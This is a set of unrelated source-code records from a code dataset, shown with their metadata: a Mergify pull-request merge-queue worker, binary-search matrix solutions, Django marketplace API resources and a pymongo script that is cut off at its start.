movie_rate_pos_dict = generate_all_movie_rates()\n# np.save(os.path.join(workdir, 'movie_rates_matrix.npy'), movie_rates_matrix)\n# np.save(os.path.join(workdir, 'movie_rates_y.npy'), movie_rates_y)","sub_path":"SVD/count.py","file_name":"count.py","file_ext":"py","file_size_in_byte":5678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"649929792","text":"# -*- encoding: utf-8 -*-\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport itertools\nimport json\nfrom concurrent import futures\n\nimport attr\n\nimport daiquiri\n\nimport github\n\nimport tenacity\n\nimport uhashring\n\nfrom mergify_engine import backports\nfrom mergify_engine import branch_protection\nfrom mergify_engine import branch_updater\nfrom mergify_engine import check_api\nfrom mergify_engine import config\nfrom mergify_engine import mergify_pull\nfrom mergify_engine import rules\nfrom mergify_engine import utils\nfrom mergify_engine.worker import app\n\n\nLOG = daiquiri.getLogger(__name__)\n\n\ndef get_ring(topology, kind):\n return uhashring.HashRing(\n nodes=list(itertools.chain.from_iterable(\n map(lambda x: \"worker-%s-%003d@%s\" % (kind, x, fqdn), range(w))\n for fqdn, w in sorted(topology.items())\n )))\n\n\nRINGS_PER_SUBSCRIPTION = {\n True: get_ring(config.TOPOLOGY_SUBSCRIBED, \"sub\"),\n False: get_ring(config.TOPOLOGY_FREE, \"free\")\n}\n\n\n@app.task\ndef handle(installation_id, installation_token, subscription,\n branch_rules, event_type, data, event_pull_raw):\n # NOTE(sileht): The processor is not concurrency safe, so a repo is always\n # sent to the same worker.\n # This work in coordination with app.conf.worker_direct = True that creates\n # a dedicated queue on exchange c.dq2 for each worker\n #ring = RINGS_PER_SUBSCRIPTION[subscription[\"subscribed\"]]\n ring = get_ring(config.TOPOLOGY_FREE, \"free\")\n routing_key = ring.get_node(data[\"repository\"][\"full_name\"])\n LOG.info(\"Sending repo %s to %s\", data[\"repository\"][\"full_name\"],\n routing_key)\n\n _handle.s(installation_id, installation_token, subscription,\n branch_rules, event_type, data, event_pull_raw\n ).apply_async(exchange='C.dq2', routing_key=routing_key)\n\n # _handle(installation_id, installation_token, subscription,\n # branch_rules, event_type, data, event_pull_raw)\n\n@app.task\ndef _handle(installation_id, installation_token, subscription,\n branch_rules, event_type, data, event_pull_raw):\n pull = mergify_pull.MergifyPull.from_raw(installation_id,\n installation_token,\n event_pull_raw)\n MergifyEngine(installation_id, installation_token, subscription,\n pull.g_pull.base.repo).handle(\n branch_rules, event_type, data, pull)\n\n\n@attr.s\nclass Caching(object):\n repository = attr.ib()\n installation_id = attr.ib()\n _redis = attr.ib(factory=utils.get_redis_for_cache, init=False)\n\n def _get_logprefix(self, branch=\"\"):\n return (self.repository.owner.login + \"/\" + self.repository.name +\n \"/pull/XXX@\" + branch + \" (-)\")\n\n def _get_cache_key(self, branch):\n # Use only IDs, not name\n return \"queues~%s~%s~%s~%s~%s\" % (\n self.installation_id, self.repository.owner.login.lower(),\n self.repository.name.lower(), self.repository.private, branch)\n\n def _cache_save_pull(self, pull):\n key = self._get_cache_key(pull.g_pull.base.ref)\n self._redis.hset(key, pull.g_pull.number, json.dumps(pull.jsonify()))\n\n def _cache_remove_pull(self, pull):\n key = self._get_cache_key(pull.g_pull.base.ref)\n self._redis.hdel(key, pull.g_pull.number)\n\n def _get_cached_branches(self):\n return [b.split('~')[5] for b in\n self._redis.keys(self._get_cache_key(\"*\"))]\n\n def get_cache_for_pull_number(self, current_branch, number):\n key = self._get_cache_key(current_branch)\n p = self._redis.hget(key, number)\n return {} if p is None else json.loads(p)\n\n def get_pr_for_pull_number(self, current_branch, number):\n p = self.get_cache_for_pull_number(current_branch, number)\n if p:\n return github.PullRequest.PullRequest(\n self.repository._requester, {}, p,\n completed=True)\n\n def get_pr_for_sha(self, sha):\n for branch in self._get_cached_branches():\n incoming_pull = self._get_cache_for_pull_sha(branch, sha)\n if incoming_pull:\n return github.PullRequest.PullRequest(\n self.repository._requester, {}, incoming_pull,\n completed=True)\n\n def _get_cache_for_pull_sha(self, current_branch, sha):\n key = self._get_cache_key(current_branch)\n raw_pulls = self._redis.hgetall(key)\n for pull in raw_pulls.values():\n pull = json.loads(pull)\n if pull[\"head\"][\"sha\"] == sha:\n return pull\n return {} # pragma: no cover\n\n\nclass MergifyEngine(Caching):\n def __init__(self, installation_id, installation_token,\n subscription, repo):\n super(MergifyEngine, self).__init__(repository=repo,\n installation_id=installation_id)\n self._installation_token = installation_token\n self._subscription = subscription\n\n def handle(self, branch_rules, event_type, data, incoming_pull):\n # Everything start here\n incoming_branch = incoming_pull.g_pull.base.ref\n incoming_state = incoming_pull.g_pull.state\n\n try:\n branch_rule = rules.get_branch_rule(branch_rules, incoming_branch)\n except rules.InvalidRules as e: # pragma: no cover\n # Not configured, post status check with the error message\n if (event_type == \"pull_request\" and\n data[\"action\"] in [\"opened\", \"synchronize\"]):\n check_api.set_check_run(\n incoming_pull.g_pull, \"current-config-checker\",\n \"completed\", \"failure\", output={\n \"title\": \"The Mergify configuration is invalid\",\n \"summary\": str(e)\n })\n\n return\n\n try:\n branch_protection.configure_protection_if_needed(\n self.repository, incoming_branch, branch_rule)\n except github.GithubException as e: # pragma: no cover\n if e.status == 404 and e.data[\"message\"] == \"Branch not found\":\n LOG.info(\"head branch no longer exists\",\n pull_request=incoming_pull)\n return\n raise\n\n if not branch_rule:\n LOG.info(\"Mergify disabled on branch\", branch=incoming_branch)\n return\n\n # PULL REQUEST UPDATER\n\n collaborators = [u.id for u in self.repository.get_collaborators()]\n\n if incoming_state == \"closed\":\n self._cache_remove_pull(incoming_pull)\n LOG.info(\"Just update cache (pull request closed)\")\n\n if (event_type == \"pull_request\" and\n data[\"action\"] in [\"closed\", \"labeled\"] and\n incoming_pull.g_pull.merged):\n backports.backport_from_labels(\n incoming_pull,\n branch_rule[\"automated_backport_labels\"],\n self._installation_token)\n\n if event_type == \"pull_request\" and data[\"action\"] == \"closed\":\n self.get_processor().proceed_queue(\n incoming_branch, branch_rule, collaborators)\n\n if not incoming_pull.g_pull.merged:\n incoming_pull.post_check_status(\n \"success\", \"Pull request closed unmerged\")\n\n head_branch = incoming_pull.g_pull.head.ref\n if head_branch.startswith(\"mergify/bp/%s\" % incoming_branch):\n try:\n self.repository.get_git_ref(\n \"heads/%s\" % head_branch\n ).delete()\n LOG.info(\"branch deleted\",\n pull_request=incoming_pull,\n branch=head_branch)\n except github.GithubException as e: # pragma: no cover\n if e.status != 404:\n raise\n\n return\n\n # First, remove informations we don't want to get from cache, so their\n # will be recomputed by MergifyPull.complete()\n if event_type == \"refresh\":\n cache = {}\n old_status = None\n else:\n cache = self.get_cache_for_pull_number(incoming_branch,\n incoming_pull.g_pull.number)\n cache = dict((k, v) for k, v in cache.items()\n if k.startswith(\"mergify_engine_\"))\n old_status = cache.pop(\"mergify_engine_status\", None)\n if event_type in [\"status\", \"check_run\", \"check_suite\"]:\n cache.pop(\"mergify_engine_required_statuses\", None)\n elif event_type == \"pull_request_review\":\n cache.pop(\"mergify_engine_reviews_ok\", None)\n cache.pop(\"mergify_engine_reviews_ko\", None)\n elif (event_type == \"pull_request\" and\n data[\"action\"] == \"synchronize\"):\n cache.pop(\"mergify_engine_required_statuses\", None)\n\n changed = incoming_pull.complete(cache, branch_rule, collaborators)\n if changed:\n self._cache_save_pull(incoming_pull)\n\n if (event_type == \"pull_request_review\" and\n data[\"review\"][\"user\"][\"id\"] not in collaborators):\n LOG.info(\"Just update cache (pull_request_review non-collab)\")\n return\n\n # NOTE(sileht): PullRequest updated or comment posted, maybe we need to\n # update github\n # Get and refresh the queues\n if old_status != incoming_pull.status:\n incoming_pull.post_check_status(\n incoming_pull.github_state,\n incoming_pull.github_description,\n )\n\n self.get_processor().proceed_queue(\n incoming_branch, branch_rule, collaborators)\n\n def get_processor(self):\n return Processor(subscription=self._subscription,\n repository=self.repository,\n installation_id=self.installation_id)\n\n\nclass Processor(Caching):\n def __init__(self, subscription, repository, installation_id):\n super(Processor, self).__init__(repository=repository,\n installation_id=installation_id)\n self._subscription = subscription\n\n def _build_queue(self, branch, branch_rule, collaborators):\n \"\"\"Return the pull requests from redis cache ordered by sort status.\"\"\"\n data = self._redis.hgetall(self._get_cache_key(branch))\n\n with futures.ThreadPoolExecutor(\n max_workers=config.FETCH_WORKERS) as tpe:\n pulls = sorted(tpe.map(\n lambda p: self._load_from_cache_and_complete(\n p, branch_rule, collaborators),\n data.values()))\n LOG.info(\"%s, queues content:\", self._get_logprefix(branch))\n for p in pulls:\n LOG.info(\"sha: %s->%s\",\n p.g_pull.base.sha, p.g_pull.head.sha,\n pull_request=p)\n return pulls\n\n def _load_from_cache_and_complete(self, data, branch_rule, collaborators):\n data = json.loads(data)\n pull = mergify_pull.MergifyPull(\n github.PullRequest.PullRequest(self.repository._requester, {},\n data, completed=True),\n self.installation_id)\n changed = pull.complete(data, branch_rule, collaborators)\n if changed:\n self._cache_save_pull(pull)\n return pull\n\n def _get_next_pull_to_processed(self, branch, branch_rule, collaborators):\n \"\"\"Return the next pull request to proceed.\n\n This take the pull request with the higher status that is not yet\n closed.\n \"\"\"\n queue = self._build_queue(branch, branch_rule, collaborators)\n\n while queue:\n p = queue.pop(0)\n\n if p.mergify_state == mergify_pull.MergifyState.NOT_READY:\n continue\n\n expected_state = p.mergify_state\n\n # NOTE(sileht): We refresh it before processing, because the cache\n # can be outdated, user may have manually merged the PR or\n # mergify_state may have changed by an event not yet received.\n\n # FIXME(sileht): This will refresh the first pull request of the\n # queue on each event. To limit this almost useless refresh, we\n # should be smarted on when we call proceed_queue()\n p.refresh(branch_rule, collaborators)\n self._cache_save_pull(p)\n\n if p.g_pull.state == \"closed\":\n # NOTE(sileht): PR merged in the meantime or manually\n self._cache_remove_pull(p)\n elif expected_state != p.mergify_state:\n # NOTE(sileht): The state have changed, put back the pull into\n # the queue and resort it\n queue.append(p)\n queue.sort()\n else:\n return p\n\n @tenacity.retry(retry=tenacity.retry_never)\n def proceed_queue(self, branch, branch_rule, collaborators):\n\n p = self._get_next_pull_to_processed(\n branch, branch_rule, collaborators)\n if not p:\n LOG.info(\"nothing to do\",\n repository=self.repository.full_name,\n branch=branch)\n return\n\n if p.mergify_state == mergify_pull.MergifyState.READY:\n p.post_check_status(\"success\", \"Merged\")\n\n if p.merge(branch_rule[\"merge_strategy\"][\"method\"],\n branch_rule[\"merge_strategy\"][\"rebase_fallback\"]):\n # Wait for the closed event now\n LOG.info(\"merged\", pull_request=p)\n else: # pragma: no cover\n p.set_and_post_error(\"Merge fail\")\n self._cache_save_pull(p)\n raise tenacity.TryAgain\n\n elif p.mergify_state == mergify_pull.MergifyState.ALMOST_READY:\n LOG.info(\"waiting for final statuses completion\", pull_request=p)\n\n elif p.mergify_state == mergify_pull.MergifyState.NEED_BRANCH_UPDATE:\n if branch_updater.update(p, self._subscription[\"token\"]):\n # Wait for the synchronize event now\n LOG.info(\"branch updated\", pull_request=p)\n else: # pragma: no cover\n p.set_and_post_error(\"contributor branch is not updatable, \"\n \"manual update/rebase required.\")\n self._cache_save_pull(p)\n raise tenacity.TryAgain\n","sub_path":"mergify_engine/tasks/engine/v1.py","file_name":"v1.py","file_ext":"py","file_size_in_byte":15206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"151724601","text":"from typing import List\n\n#用二分法\nclass Solution:\n def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\n if not matrix or not matrix[0]:return False\n m, n = len(matrix), len(matrix[0])\n l1, r1 = 0, m-1\n l2, r2 = 0, n-1\n m1, m2 = 0, 0\n while l1 <= r1:\n m1 = (l1 + r1)//2\n if target >= matrix[m1][0] and target <= matrix[m1][-1]:\n break\n elif target < matrix[m1][0]:\n r1 = m1 - 1\n else:\n l1 = m1 + 1\n while l2 <= r2:\n m2 = (l2 + r2)//2\n if matrix[m1][m2] == target:\n return True\n elif target > matrix[m1][m2]:\n l2 = m2 + 1\n else:\n r2 = m2 - 1\n return False\n\n# 方���二,直接一次二分法, 直接整个看错一个整体进行二分。判断matrix[mid//n][mid%n]和target关系,n是数组里数组的长\nclass Solution2:\n def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\n if not matrix or not matrix[0]:return False\n # m, n = len(matrix)-1, len(matrix[0])-1\n m, n = len(matrix), len(matrix[0])\n l, r = 0, m*n-1\n while l <= r:\n mid = (l+r)//2\n # if matrix[mid//n][mid%m] == target:\n # return True\n if matrix[mid//n][mid%n] < target:\n l = mid + 1\n elif matrix[mid//n][mid%n] > target:\n r = mid - 1\n else:\n return True\n return False","sub_path":"Week_04/74_searchmatrix.py","file_name":"74_searchmatrix.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"347250691","text":"from django.conf import settings, urls\nfrom django.db import transaction\nfrom django.db.models import Q\nfrom django.views import debug\n\nimport commonware.log\nimport waffle\nfrom celery_tasktree import TaskTree\nimport raven.base\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework import generics\nfrom rest_framework.mixins import ListModelMixin, RetrieveModelMixin\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.response import Response\nfrom rest_framework.serializers import (BooleanField, CharField,\n ChoiceField,\n DecimalField,\n HyperlinkedIdentityField,\n HyperlinkedRelatedField,\n ModelSerializer)\nfrom rest_framework.viewsets import GenericViewSet, ModelViewSet\n\nfrom tastypie import fields, http\nfrom tastypie.serializers import Serializer\nfrom tastypie.throttle import CacheThrottle\nfrom tastypie.utils import trailing_slash\n\nimport amo\nfrom amo.utils import memoize\nfrom addons.forms import CategoryFormSet\nfrom addons.models import Addon, AddonUser, Category, Webapp\nfrom amo.decorators import write\nfrom amo.utils import no_translation\nfrom constants.applications import DEVICE_TYPES\nfrom constants.payments import PAYMENT_METHOD_CHOICES, PROVIDER_CHOICES\nfrom files.models import Platform\nfrom lib.metrics import record_action\nfrom market.models import AddonPremium, Price, PriceCurrency\n\nfrom mkt.api.authentication import (SharedSecretAuthentication,\n OptionalOAuthAuthentication,\n RestOAuthAuthentication)\nfrom mkt.api.authorization import (AllowAppOwner, AllowReviewerReadOnly,\n AppOwnerAuthorization, GroupPermission,\n OwnerAuthorization)\nfrom mkt.api.base import (CORSMixin, CORSResource, GenericObject, http_error,\n MarketplaceModelResource, MarketplaceResource)\nfrom mkt.api.forms import (CategoryForm, DeviceTypeForm, UploadForm)\nfrom mkt.api.http import HttpLegallyUnavailable\nfrom mkt.carriers import CARRIER_MAP, CARRIERS, get_carrier_id\nfrom mkt.developers import tasks\nfrom mkt.regions import get_region, get_region_id, REGIONS_DICT\nfrom mkt.submit.forms import AppDetailsBasicForm\nfrom mkt.webapps.models import get_excluded_in\nfrom mkt.webapps.tasks import _update_manifest\nfrom mkt.webapps.utils import app_to_dict\n\nlog = commonware.log.getLogger('z.api')\n\n\nclass AppResource(CORSResource, MarketplaceModelResource):\n payment_account = fields.ToOneField('mkt.developers.api.AccountResource',\n 'app_payment_account', null=True)\n premium_type = fields.IntegerField(null=True)\n previews = fields.ToManyField('mkt.submit.api.PreviewResource',\n 'previews', readonly=True)\n upsold = fields.ToOneField('mkt.api.resources.AppResource', 'upsold',\n null=True)\n\n class Meta(MarketplaceModelResource.Meta):\n queryset = Webapp.objects.all() # Gets overriden in dispatch.\n fields = ['categories', 'description', 'device_types', 'homepage',\n 'id', 'name', 'payment_account', 'premium_type',\n 'status', 'support_email', 'support_url']\n list_allowed_methods = ['get', 'post']\n detail_allowed_methods = ['get', 'put', 'delete']\n always_return_data = True\n authentication = (SharedSecretAuthentication(),\n OptionalOAuthAuthentication())\n authorization = AppOwnerAuthorization()\n resource_name = 'app'\n serializer = Serializer(formats=['json'])\n slug_lookup = 'app_slug'\n # Throttle users without Apps:APIUnthrottled at 10 POST requests/day.\n throttle = CacheThrottle(throttle_at=10, timeframe=60 * 60 * 24)\n\n def dispatch(self, request_type, request, **kwargs):\n # Using `Webapp.objects.all()` here forces a new queryset, which for\n # now avoids bug 854505. We're also using this to filter by flagged\n # apps.\n self._meta.queryset_base = Webapp.objects.all()\n self._meta.queryset = self._meta.queryset_base.exclude(\n id__in=get_excluded_in(REGIONS_DICT[get_region()].id))\n return super(AppResource, self).dispatch(request_type, request,\n **kwargs)\n\n @write\n @transaction.commit_on_success\n def obj_create(self, bundle, request, **kwargs):\n form = UploadForm(bundle.data)\n\n if not request.amo_user.read_dev_agreement:\n log.info(u'Attempt to use API without dev agreement: %s'\n % request.amo_user.pk)\n raise http_error(http.HttpUnauthorized,\n 'Terms of service not accepted.')\n\n if not form.is_valid():\n raise self.form_errors(form)\n\n if not (OwnerAuthorization()\n .is_authorized(request, object=form.obj)):\n raise http_error(http.HttpForbidden,\n 'You do not own that app.')\n\n plats = [Platform.objects.get(id=amo.PLATFORM_ALL.id)]\n\n # Create app, user and fetch the icon.\n bundle.obj = Addon.from_upload(form.obj, plats,\n is_packaged=form.is_packaged)\n AddonUser(addon=bundle.obj, user=request.amo_user).save()\n\n self._icons_and_images(bundle.obj)\n record_action('app-submitted', request, {'app-id': bundle.obj.pk})\n\n log.info('App created: %s' % bundle.obj.pk)\n return bundle\n\n def log_throttled_access(self, request):\n \"\"\"\n Only throttle POST requests.\n \"\"\"\n if request.method == 'POST':\n super(AppResource, self).log_throttled_access(request)\n\n def _icons_and_images(self, bundle_obj):\n pipeline = TaskTree()\n pipeline.push(tasks.fetch_icon, args=[bundle_obj])\n pipeline.apply_async()\n\n @write\n def obj_get(self, request=None, **kwargs):\n obj = self.get_and_check_ownership(request, allow_anon=True, **kwargs)\n log.info('App retreived: %s' % obj.pk)\n return obj\n\n def devices(self, data):\n with no_translation():\n names = dict([(n.api_name, n.id)\n for n in DEVICE_TYPES.values()])\n filtered = [names.get(n, n) for n in data.get('device_types', [])]\n return {'device_types': filtered}\n\n def formset(self, data):\n cats = data.pop('categories', [])\n return {'form-TOTAL_FORMS': 1,\n 'form-INITIAL_FORMS': 1,\n 'form-MAX_NUM_FORMS': '',\n 'form-0-categories': cats}\n\n def get_and_check_ownership(self, request, allow_anon=False, **kwargs):\n try:\n # Use queryset, not get_object_list to ensure a distinction\n # between a 404 and a 403.\n obj = self._meta.queryset.get(**kwargs)\n except self._meta.object_class.DoesNotExist:\n unavail = self._meta.queryset_base.filter(**kwargs)\n if unavail.exists():\n obj = unavail[0]\n # Owners can see their app no matter what region.\n if AppOwnerAuthorization().is_authorized(request, object=obj):\n return obj\n data = {}\n for key in ('name', 'support_email', 'support_url'):\n value = getattr(obj, key)\n data[key] = unicode(value) if value else ''\n raise http_error(HttpLegallyUnavailable,\n 'Not available in your region.',\n extra_data=data)\n raise http_error(http.HttpNotFound,\n 'No such app.')\n\n # If it's public, just return it.\n if allow_anon and obj.is_public():\n return obj\n\n # Now do the final check to see if you are allowed to see it and\n # return a 403 if you can't.\n if not AppOwnerAuthorization().is_authorized(request, object=obj):\n raise http_error(http.HttpForbidden,\n 'You do not own that app.')\n return obj\n\n @write\n @transaction.commit_on_success\n def obj_delete(self, request, **kwargs):\n app = self.get_and_check_ownership(request, **kwargs)\n app.delete('Removed via API')\n\n @write\n @transaction.commit_on_success\n def obj_update(self, bundle, request, **kwargs):\n data = bundle.data\n obj = self.get_and_check_ownership(request, **kwargs)\n bundle.obj = obj\n data['app_slug'] = data.get('app_slug', obj.app_slug)\n data.update(self.formset(data))\n data.update(self.devices(data))\n self.update_premium_type(bundle)\n\n# TODO: renable when regions are sorted out.\n# if 'regions' in data:\n# data['regions'] = [REGIONS_DICT[r['slug']].id for r in data['regions']\n# if r.get('slug') in REGIONS_DICT]\n\n forms = [AppDetailsBasicForm(data, instance=obj, request=request),\n DeviceTypeForm(data, addon=obj),\n# RegionForm(data, product=obj),\n CategoryFormSet(data, addon=obj, request=request),\n CategoryForm({'categories': data['form-0-categories']})]\n\n valid = all([f.is_valid() for f in forms])\n if not valid:\n raise self.form_errors(forms)\n forms[0].save(obj)\n forms[1].save(obj)\n forms[2].save()\n# forms[3].save()\n log.info('App updated: %s' % obj.pk)\n\n return bundle\n\n def update_premium_type(self, bundle):\n self.hydrate_premium_type(bundle)\n if bundle.obj.premium_type in (amo.ADDON_FREE, amo.ADDON_FREE_INAPP):\n return\n\n ap = AddonPremium.objects.safer_get_or_create(addon=bundle.obj)[0]\n if not bundle.data.get('price') or not Price.objects.filter(\n price=bundle.data['price']).exists():\n tiers = ', '.join('\"%s\"' % p.price\n for p in Price.objects.exclude(price=\"0.00\"))\n raise fields.ApiFieldError(\n 'Premium app specified without a valid price. Price can be'\n ' one of %s.' % (tiers,))\n else:\n ap.price = Price.objects.get(price=bundle.data['price'])\n ap.save()\n\n def dehydrate(self, bundle):\n obj = bundle.obj\n amo_user = getattr(bundle.request, 'amo_user', None)\n region = (bundle.request.REGION.id if hasattr(bundle.request, 'REGION')\n else None)\n bundle.data.update(app_to_dict(obj, region=region, profile=amo_user,\n request=bundle.request))\n bundle.data['privacy_policy'] = (\n PrivacyPolicyResource().get_resource_uri(bundle))\n\n self.dehydrate_extra(bundle)\n return bundle\n\n def dehydrate_extra(self, bundle):\n if bundle.obj.upsold:\n bundle.data['upsold'] = self.get_resource_uri(bundle.obj.upsold.free)\n\n def hydrate_premium_type(self, bundle):\n typ = amo.ADDON_PREMIUM_API_LOOKUP.get(bundle.data['premium_type'],\n None)\n if typ is None:\n raise fields.ApiFieldError(\n \"premium_type should be one of 'free', 'premium', 'free-inapp'\"\n \", 'premium-inapp', or 'other'.\")\n bundle.obj.premium_type = typ\n\n def get_object_list(self, request):\n if not request.amo_user:\n log.info('Anonymous listing not allowed')\n raise http_error(http.HttpForbidden,\n 'Anonymous listing not allowed.')\n return self._meta.queryset.filter(type=amo.ADDON_WEBAPP,\n authors=request.amo_user)\n\n def override_urls(self):\n return [\n urls.url(\n r\"^%s/(?P\\d+)/(?Pprivacy)%s$\" %\n (self._meta.resource_name, trailing_slash()),\n self.wrap_view('get_privacy_policy'),\n name=\"api_dispatch_detail\"),\n urls.url(\n r\"^%s/(?P[^/<>\\\"']+)/\"\n r\"(?Pprivacy)%s$\" %\n (self._meta.resource_name, trailing_slash()),\n self.wrap_view('get_privacy_policy'),\n name=\"api_dispatch_detail\"),\n ]\n\n def get_privacy_policy(self, request, **kwargs):\n return PrivacyPolicyResource().dispatch('detail', request, **kwargs)\n\n\nclass PrivacyPolicyResource(CORSResource, MarketplaceModelResource):\n\n class Meta(MarketplaceResource.Meta):\n api_name = 'apps'\n queryset = Webapp.objects.all() # Gets overriden in dispatch.\n fields = ['privacy_policy']\n detail_allowed_methods = ['get', 'put']\n always_return_data = True\n authentication = OptionalOAuthAuthentication()\n authorization = AppOwnerAuthorization()\n resource_name = 'privacy'\n serializer = Serializer(formats=['json'])\n slug_lookup = 'app_slug'\n # Throttle users without Apps:APIUnthrottled at 10 POST requests/day.\n throttle = CacheThrottle(throttle_at=10, timeframe=60 * 60 * 24)\n\n\nclass CategorySerializer(ModelSerializer):\n name = CharField('name')\n resource_uri = HyperlinkedIdentityField(view_name='app-category-detail')\n\n class Meta:\n model = Category\n fields = ('name', 'id', 'resource_uri', 'slug')\n view_name = 'category'\n\n\nclass CategoryViewSet(ListModelMixin, RetrieveModelMixin, CORSMixin,\n GenericViewSet):\n model = Category\n serializer_class = CategorySerializer\n permission_classes = (AllowAny,)\n cors_allowed_methods = ('get',)\n slug_lookup = 'slug'\n\n def get_queryset(self):\n qs = Category.objects.filter(type=amo.ADDON_WEBAPP,\n weight__gte=0)\n if self.action == 'list':\n qs = qs.filter(Q(region__isnull=True) |\n Q(region=get_region_id()))\n # Check carrier.\n carrier = get_carrier_id()\n carrier_f = Q(carrier__isnull=True)\n if carrier:\n carrier_f |= Q(carrier=carrier)\n qs = qs.filter(carrier_f)\n return qs.order_by('-carrier', '-region', '-weight')\n\n\ndef waffles(request):\n switches = ['in-app-sandbox', 'allow-refund', 'buchets', 'rocketfuel']\n flags = ['allow-b2g-paid-submission', 'override-region-exclusion']\n res = dict([s, waffle.switch_is_active(s)] for s in switches)\n res.update(dict([f, waffle.flag_is_active(request, f)] for f in flags))\n return res\n\n\n@memoize(prefix='config-settings')\ndef get_settings():\n safe = debug.get_safe_settings()\n _settings = ['SITE_URL']\n return dict([k, safe[k]] for k in _settings)\n\n\nclass ConfigResource(CORSResource, MarketplaceResource):\n \"\"\"\n A resource that is designed to be exposed externally and contains\n settings or waffle flags that might be relevant to the client app.\n \"\"\"\n version = fields.CharField()\n flags = fields.DictField('flags')\n settings = fields.DictField('settings')\n\n class Meta(MarketplaceResource.Meta):\n detail_allowed_methods = ['get']\n list_allowed_methods = []\n resource_name = 'config'\n\n def obj_get(self, request, **kw):\n if kw['pk'] != 'site':\n raise http_error(http.HttpNotFound,\n 'No such configuration.')\n\n return GenericObject({\n # This is the git commit on IT servers.\n 'version': getattr(settings, 'BUILD_ID_JS', ''),\n 'flags': waffles(request),\n 'settings': get_settings(),\n })\n\n\nclass RegionResource(CORSResource, MarketplaceResource):\n name = fields.CharField('name')\n slug = fields.CharField('slug')\n id = fields.IntegerField('id')\n default_currency = fields.CharField('default_currency')\n default_language = fields.CharField('default_language')\n has_payments = fields.BooleanField('has_payments')\n ratingsbodies = fields.ListField('ratingsbodies')\n\n class Meta(MarketplaceResource.Meta):\n detail_allowed_methods = ['get']\n list_allowed_methods = ['get']\n resource_name = 'region'\n slug_lookup = 'slug'\n\n def dehydrate_ratingsbodies(self, bundle):\n return [rb.name for rb in bundle.obj.ratingsbodies]\n\n def obj_get_list(self, request=None, **kwargs):\n return REGIONS_DICT.values()\n\n def obj_get(self, request=None, **kwargs):\n return REGIONS_DICT.get(kwargs['pk'], None)\n\n\nclass CarrierResource(CORSResource, MarketplaceResource):\n name = fields.CharField('name')\n slug = fields.CharField('slug')\n id = fields.IntegerField('id')\n\n class Meta(MarketplaceResource.Meta):\n detail_allowed_methods = ['get']\n list_allowed_methods = ['get']\n resource_name = 'carrier'\n slug_lookup = 'slug'\n\n def dehydrate_ratingsbodies(self, bundle):\n return [rb.name for rb in bundle.obj.ratingsbodies]\n\n def obj_get_list(self, request=None, **kwargs):\n return CARRIERS\n\n def obj_get(self, request=None, **kwargs):\n return CARRIER_MAP.get(kwargs['pk'], None)\n\n\n@api_view(['POST'])\n@permission_classes([AllowAny])\ndef error_reporter(request):\n request._request.CORS = ['POST']\n client = raven.base.Client(settings.SENTRY_DSN)\n client.capture('raven.events.Exception', data=request.DATA)\n return Response(status=204)\n\n\nclass RefreshManifestViewSet(GenericViewSet, CORSMixin):\n model = Webapp\n permission_classes = (AllowAppOwner, AllowReviewerReadOnly)\n cors_allowed_methods = ('post',)\n slug_lookup = 'app_slug'\n\n def detail_post(self, request, **kwargs):\n obj = self.get_object()\n self.check_object_permissions(request, obj)\n if obj.is_packaged:\n return Response(\n status=400,\n data={'reason': 'App is a packaged app.'})\n _update_manifest(obj.pk, True, {})\n return Response(status=204)\n\n\nclass EnumeratedField(ChoiceField):\n\n def from_native(self, value):\n for k, v in self.choices:\n if value == v:\n return k\n\n def to_native(self, key):\n for k, v in self.choices:\n if key == k:\n return v\n\n\nclass PriceTierSerializer(ModelSerializer):\n resource_uri = HyperlinkedIdentityField(view_name='price-tier-detail')\n active = BooleanField()\n name = CharField()\n method = EnumeratedField(PAYMENT_METHOD_CHOICES)\n price = DecimalField()\n\n class Meta:\n model = Price\n fields = ['resource_uri', 'active', 'name', 'method', 'price']\n\n\nclass PriceTierViewSet(generics.CreateAPIView,\n generics.RetrieveUpdateDestroyAPIView,\n ModelViewSet):\n permission_classes = [GroupPermission('Admin', '%')]\n authentication_classes = [RestOAuthAuthentication]\n serializer_class = PriceTierSerializer\n model = Price\n\n\nclass PriceCurrencySerializer(ModelSerializer):\n resource_uri = HyperlinkedIdentityField(view_name='price-currency-detail')\n tier = HyperlinkedRelatedField(view_name='price-tier-detail')\n currency = CharField()\n carrier = CharField(required=False)\n price = DecimalField()\n provider = EnumeratedField(PROVIDER_CHOICES)\n method = EnumeratedField(PAYMENT_METHOD_CHOICES)\n\n class Meta:\n model = PriceCurrency\n fields = ['resource_uri', 'tier', 'currency', 'carrier',\n 'price', 'provider', 'method']\n\n\nclass PriceCurrencyViewSet(ModelViewSet):\n permission_classes = [GroupPermission('Admin', '%')]\n authentication_classes = [RestOAuthAuthentication]\n serializer_class = PriceCurrencySerializer\n model = PriceCurrency\n filter_fields = ('tier', 'provider', 'currency', 'price')\n\n def post_save(self, obj, created):\n log.info('Price %s %s.' % (obj, 'created' if created else 'updated'))\n\n def destroy(self, request, *args, **kwargs):\n obj = self.get_object()\n obj.delete()\n log.info('Price %s deleted.' % (obj,))\n return Response(status=204)\n","sub_path":"mkt/api/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":20372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"538878751","text":"from pymongo import MongoClient\r\nfrom pprint import pprint\r\nprint(\"Enter your mongo string\")\r\naddress=raw_input()\r\nclient = MongoClient(address)\r\ndb=client['thedata']\r\ncollect=db['collection']\r\n\r\nfield=[]\r\nwith open(\"field.csv\") as infile:\r\n\tfor line in 